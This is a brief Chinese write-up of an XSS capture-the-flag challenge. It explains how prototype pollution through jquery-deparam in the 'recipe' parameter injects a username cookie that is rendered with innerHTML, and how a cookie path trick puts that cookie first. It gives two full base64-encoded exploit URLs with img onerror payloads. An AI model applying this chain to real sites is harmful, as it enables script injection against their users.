xss challenge

challenge url : https://challenge-0821.intigriti.io/

write up

源码分析

首页iframe

 <iframe src="challenge/cooking.html" width="100%" height="1000px"></iframe>

查看cooking页面，页面链接提示参数recipe。查看main.js，读cookie中的username，显示，读recipe中的参数显示，不过recipe中的参数都是innerText显示的，只有username用的是innerHTML。再结合注释中的提示// This way no XSS will ever be possible because you cannot change the cookie unless you do it yourself!,可以看到触发点是cookie中的username。看到cookie，看到google analytics<script src="https://www.google-analytics.com/analytics.js"></script>，第一反应是Protype pollution，ga pp cookie注入。尝试了几下，发现是在参数recipe中，利用的是jquery-deparam.js造成的原型污染。

原型污染

污染之后，发现并没有成功，页面没有执行js，以为没有成功，查看document.cookie，发现cookie成功注入了，不过是在后面，而readCookie取的是第一个。那么就是如何将cookie挤到前面去。设置cookie时，通过设置path，可以将新cookie排到前面去。 payload1: https://challenge-0821.intigriti.io/challenge/cooking.html?recipe=X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEZGRkJTNDaW1nJTIwc3JjJTIwb25lcnJvciUzRGFsZXJ0JTI4ZG9jdW1lbnQlMkVkb21haW4lMjklM0UlM0IlMjBleHBpcmVzJTNERnJpJTJDJTIwMzElMjBBdWclMjAyMDIxJTIwMjMlM0E1OSUzQTU5JTIwR01UJTNCJTIwcGF0aCUzRCUyRmNoYWxsZW5nZSUyRiUzQiUyMGRvbWFpbiUzRGNoYWxsZW5nZSUyRDA4MjElMkVpbnRpZ3JpdGklMkVpbyUzQiUyMCUwQSUyMHNlY3VyZSUzQiUyMEh0dHBPbmx5JTNCJnRpdGxlPVRoZSUyMGJhc2ljJTIwWFNTJmluZ3JlZGllbnRzJTVCJTVEPUElMjBzY3JpcHQlMjB0YWcmaW5ncmVkaWVudHMlNUIlNUQ9U29tZSUyMGphdmFzY3JpcHQmcGF5bG9hZD0lM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0Umc3RlcHMlNUIlNUQ9RmluZCUyMHRhcmdldCZzdGVwcyU1QiU1RD1JbmplY3Qmc3RlcHMlNUIlNUQ9RW5qb3k=

同时发现，不设置属性，多运行几次，cookie也会被覆盖掉 https://challenge-0821.intigriti.io/challenge/cooking.html?recipe=X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEZWVlPGltZyBzcmMgb25lcnJvciUzRGFsZXJ0KDEpPiUzQm1heEFnZTowJTNCJnRpdGxlPVRoZSUyMGJhc2ljJTIwWFNTJmluZ3JlZGllbnRzJTVCJTVEPUElMjBzY3JpcHQlMjB0YWcmaW5ncmVkaWVudHMlNUIlNUQ9U29tZSUyMGphdmFzY3JpcHQmcGF5bG9hZD0lM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0Umc3RlcHMlNUIlNUQ9RmluZCUyMHRhcmdldCZzdGVwcyU1QiU1RD1JbmplY3Qmc3RlcHMlNUIlNUQ9RW5qb3k=

引用

https://github.com/BlackFan/client-side-prototype-pollution